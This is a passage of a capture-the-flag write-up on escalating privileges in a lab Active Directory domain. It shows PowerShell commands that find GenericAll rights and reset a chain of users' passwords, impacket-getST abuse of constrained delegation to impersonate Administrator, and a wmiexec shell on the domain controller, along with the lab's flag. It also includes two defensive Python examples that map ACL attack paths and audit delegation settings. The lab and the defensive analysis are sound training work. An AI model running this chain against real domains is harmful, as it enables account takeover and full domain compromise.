INFO: LDAP Enumeration completed
INFO: Writing output to ./bloodhound-Thm.Corp-TABATHA_BRITT.json
```
Let's import the generated JSON file into BloodHound and search for attack paths. We find a path that allows us to obtain the user flag:
From the image we can see that we have GenericAll permissions on SHAWNA_BRAY, so we can change their password and log in as that user to get the user flag.
I found it very useful to do this exercise manually as well, without BloodHound. Let's start by seeing who the domain admins are:
```powershell
PS C:\Users\TEMP\Desktop> Get-ADGroup 'Domain Admins' | Get-ADGroupMember
distinguishedName : CN=Administrator,CN=Users,DC=thm,DC=corp
name : Administrator
objectClass : user
objectGUID : 6d2279fe-8712-4d84-9d82-6ca96f29d436
SamAccountName : Administrator
SID : S-1-5-21-1966530601-3185510712-10604624-500

distinguishedName : CN=CECILE_WONG,OU=ServiceAccounts,OU=FSR,OU=Tier 2,DC=thm,DC=corp
name : CECILE_WONG
objectClass : user
objectGUID : 5eceeb5b-bd89-4431-a5ec-fd2f72144de8
SamAccountName : CECILE_WONG
SID : S-1-5-21-1966530601-3185510712-10604624-1115

distinguishedName : CN=HORACE_BOYLE,OU=Test,OU=FSR,OU=Tier 2,DC=thm,DC=corp
name : HORACE_BOYLE
objectClass : user
objectGUID : ce910619-dc2d-496a-a142-647f5550dcac
SamAccountName : HORACE_BOYLE
SID : S-1-5-21-1966530601-3185510712-10604624-1138
```
OK, we have 3 domain admins: Administrator, CECILE_WONG and HORACE_BOYLE. Let's see if we have GenericAll permissions on any user by running this PowerShell one-liner, which picks up the current user from whoami:
```powershell
PS C:\Users\TEMP\Desktop> $currentUser = (whoami).ToUpper(); Get-ADUser -Filter * -Properties * | ForEach-Object { $user = $_; if ( (Get-ADUser -Identity $user.SamAccountName -Properties ntSecurityDescriptor).ntSecurityDescriptor.Access | Where-Object { $_.IdentityReference -eq $currentUser -and $_.ActiveDirectoryRights -eq "GenericAll" } ) { Write-Output $user.SamAccountName } }
SHAWNA_BRAY
RAQUEL_BENSON
PS C:\Users\TEMP\Desktop>
```
We have GenericAll permissions on two users: SHAWNA_BRAY and RAQUEL_BENSON. Let's try to change the password of SHAWNA_BRAY:
```powershell
PS C:\Users\TEMP\Desktop> Set-ADAccountPassword -Identity "SHAWNA_BRAY" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassw0rd!" -Force)
```
Now let's open a PowerShell session as SHAWNA_BRAY and continue in the same way to look for further permissions:
```powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\shawna_bray
PS C:\Users\TEMP>
```
Now we can see from bloodhound that SHAWNA_BRAY has ForceChangePassword permissions on CRUZ_HALL. Let's change their password similarly to before:
```powershell
PS C:\Users\TEMP> Set-ADAccountPassword -Identity "CRUZ_HALL" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassw0rd!" -Force)
```
Let's verify by opening a PowerShell session as CRUZ_HALL:
```powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\cruz_hall
```
CRUZ_HALL has ForceChangePassword, Owns and GenericWrite permissions on DARLA_WINTERS, one of the domain admins. Let's change their password:
```powershell
PS C:\Users\TEMP> Set-ADAccountPassword -Identity "DARLA_WINTERS" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassw0rd!" -Force)
```
And open a PowerShell session as DARLA_WINTERS:
```powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\darla_winters
PS C:\Users\TEMP>
```
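The chain TABATHA_BRITT -> SHAWNA_BRAY -> CRUZ_HALL -> DARLA_WINTERS is what BloodHound computes for you: a shortest path over ACL edges that each grant control of the next object. As an added example, not the page's code and not BloodHound's, here is that search in plain Python over the edges found in this section (plus the AllowToDelegate edge from DARLA_WINTERS to the domain controller, which is discussed next, and one constructed, harmless ReadProperty ACE for contrast). The reverse search answers the question a defender asks after reading this chain: which principals can reach the domain controller at all, so that the offending ACEs can be cleaned up.

```python
from collections import defaultdict, deque

# Rights that let the holder take over the target: reset its password, rewrite its
# attributes or owner, or (AllowedToDelegate) impersonate users towards it.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "Owns", "WriteDacl", "WriteOwner",
                  "ForceChangePassword", "AllowedToDelegate"}

# (holder, right, target). Edges from this walkthrough plus one constructed
# ReadProperty ACE, which grants no control and must not appear in any path.
EDGES = [
    ("TABATHA_BRITT", "GenericAll", "SHAWNA_BRAY"),
    ("TABATHA_BRITT", "GenericAll", "RAQUEL_BENSON"),
    ("SHAWNA_BRAY", "ForceChangePassword", "CRUZ_HALL"),
    ("CRUZ_HALL", "ForceChangePassword", "DARLA_WINTERS"),
    ("CRUZ_HALL", "Owns", "DARLA_WINTERS"),
    ("CRUZ_HALL", "GenericWrite", "DARLA_WINTERS"),
    ("DARLA_WINTERS", "AllowedToDelegate", "HAYSTACK.THM.CORP"),
    ("RAQUEL_BENSON", "ReadProperty", "DARLA_WINTERS"),   # constructed, benign
]


def build_graph(edges):
    """holder -> {target: set(rights)}, keeping only control-granting rights."""
    graph = defaultdict(dict)
    for src, right, dst in edges:
        if right in CONTROL_RIGHTS:
            graph[src].setdefault(dst, set()).add(right)
    return graph


def shortest_path(graph, start, goal):
    """Breadth-first search; returns [(holder, right, target), ...] or None."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for dst, rights in graph.get(node, {}).items():
            if dst not in prev:
                prev[dst] = (node, sorted(rights)[0])   # deterministic edge label
                queue.append(dst)
    if goal not in prev:
        return None
    path, cur = [], goal
    while prev[cur] is not None:
        src, right = prev[cur]
        path.append((src, right, cur))
        cur = src
    return path[::-1]


def principals_reaching(graph, goal):
    """Reverse BFS: every principal with some control path ending at goal."""
    reverse = defaultdict(set)
    for src, targets in graph.items():
        for dst in targets:
            reverse[dst].add(src)
    seen, queue = set(), deque([goal])
    while queue:
        node = queue.popleft()
        for src in reverse.get(node, ()):
            if src not in seen:
                seen.add(src)
                queue.append(src)
    return seen


if __name__ == "__main__":
    g = build_graph(EDGES)
    for src, right, dst in shortest_path(g, "TABATHA_BRITT", "HAYSTACK.THM.CORP"):
        print(f"{src} --{right}--> {dst}")
    print("can reach the DC:", sorted(principals_reaching(g, "HAYSTACK.THM.CORP")))
```

Every principal in the reverse-search result is effectively a domain admin regardless of group membership; removing any one edge on the chain, for instance CRUZ_HALL's rights over DARLA_WINTERS, breaks the whole path, and re-running the search confirms it.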
Now, DARLA_WINTERS has AllowToDelegate on HAYSTACK.THM.CORP, which is the domain controller. Let's try using getST.py, as BloodHound suggests, to obtain a service ticket (TGS) for Administrator. First, let's calculate the NT hash of DARLA_WINTERS's password NewPassw0rd!:
5FE2A4A4F217609A8E063620954D502A
BloodHound suggests the following getST.py command:
```sh
getST.py -spn 'HTTP/PRIMARY.testlab.local' -impersonate 'admin' -altservice 'cifs' -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'domain/victim'
```
Let's replace the parameters with the correct ones for our target:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-getST -spn 'CIFS/HAYSTACK.THM.CORP' -impersonate 'Administrator' -altservice 'cifs' -hashes :5FE2A4A4F217609A8E063620954D502A 'THM.CORP/DARLA_WINTERS' -dc-ip 10.82.165.20
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from CIFS/HAYSTACK.THM.CORP@THM.CORP to cifs/HAYSTACK.THM.CORP@THM.CORP
[*] Saving ticket in Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache
┌──(kali㉿kali)-[~/Desktop/THM]
└─$
```
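What made this step work is configuration, not a bug: DARLA_WINTERS's msDS-AllowedToDelegateTo lists a service on the DC and the account carries the TRUSTED_TO_AUTH_FOR_DELEGATION bit (constrained delegation with protocol transition), so S4U2self returns a forwardable ticket for any user the account names, and Administrator was neither marked "sensitive and cannot be delegated" nor a member of Protected Users. The audit below is an added example (not from this writeup or from impacket) that checks those conditions over a constructed set of account records. The userAccountControl bit values are the documented ones; the per-account values are assumptions made to mirror this box.

```python
from dataclasses import dataclass, field

# userAccountControl bits (documented AD values) that matter for delegation.
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
NORMAL_ACCOUNT = 0x200
DONT_EXPIRE_PASSWORD = 0x10000
SERVER_TRUST_ACCOUNT = 0x2000

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


@dataclass
class Account:
    name: str
    uac: int
    allowed_to_delegate_to: list = field(default_factory=list)  # msDS-AllowedToDelegateTo
    member_of: set = field(default_factory=set)


@dataclass(frozen=True)
class Finding:
    account: str
    issue: str


def audit_delegation(accounts):
    """Flag accounts that can impersonate users, and privileged accounts that allow it."""
    findings = []
    for a in accounts:
        if a.name.endswith("$"):
            continue   # computer accounts: delegation on a DC is expected, audit separately
        if a.uac & TRUSTED_TO_AUTH_FOR_DELEGATION and a.allowed_to_delegate_to:
            targets = ", ".join(a.allowed_to_delegate_to)
            findings.append(Finding(a.name, f"protocol-transition to {targets}"))
        elif a.uac & TRUSTED_FOR_DELEGATION:
            findings.append(Finding(a.name, "unconstrained-delegation"))
        if a.member_of & PRIVILEGED_GROUPS:
            protected = bool(a.uac & NOT_DELEGATED) or "Protected Users" in a.member_of
            if not protected:
                findings.append(Finding(a.name, "privileged-but-delegatable"))
    return findings


# Constructed records modelled on this box: DARLA_WINTERS's delegation rights are the
# ones BloodHound showed; the flags on the other accounts are assumptions.
SAMPLE_ACCOUNTS = [
    Account("Administrator", NORMAL_ACCOUNT, member_of={"Domain Admins"}),
    Account("CECILE_WONG", NORMAL_ACCOUNT | NOT_DELEGATED, member_of={"Domain Admins"}),
    Account("HORACE_BOYLE", NORMAL_ACCOUNT, member_of={"Domain Admins", "Protected Users"}),
    Account("DARLA_WINTERS", NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
            allowed_to_delegate_to=["cifs/HayStack.thm.corp"]),
    Account("AUTOMATE", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD),
    Account("HAYSTACK$", SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION),
]

if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"{f.account}: {f.issue}")
```

Either finding on its own is enough to block the impersonation seen above: clearing the protocol-transition bit on DARLA_WINTERS makes S4U2self return a non-forwardable ticket, and marking Administrator as sensitive (or putting it in Protected Users) makes the KDC refuse to issue S4U tickets for it at all.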
We now have a service ticket for Administrator. Let's export it into the KRB5CCNAME environment variable and connect as Administrator with impacket-wmiexec:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ export KRB5CCNAME=Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ env | grep KRB
KRB5CCNAME=Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-wmiexec -k -no-pass Administrator@HAYSTACK.THM.CORP -target-ip 10.82.165.20
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\Users\Administrator>tree /F
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Folder PATH listing
Volume serial number is A8A4-C362
C:.
├───3D Objects
├───Contacts
├───Desktop
│ EC2 Feedback.website
│ EC2 Microsoft Windows Guide.website
│ root.txt
│
├───Documents
├───Downloads
├───Favorites
│ │ Bing.url
│ │
│ └───Links
├───Links
│ Desktop.lnk
│ Downloads.lnk
│
├───Music
├───Pictures
├───Saved Games
├───Searches
└───Videos
```
Answer
THM{RE_RE_RE_SET_AND_DELEGATE}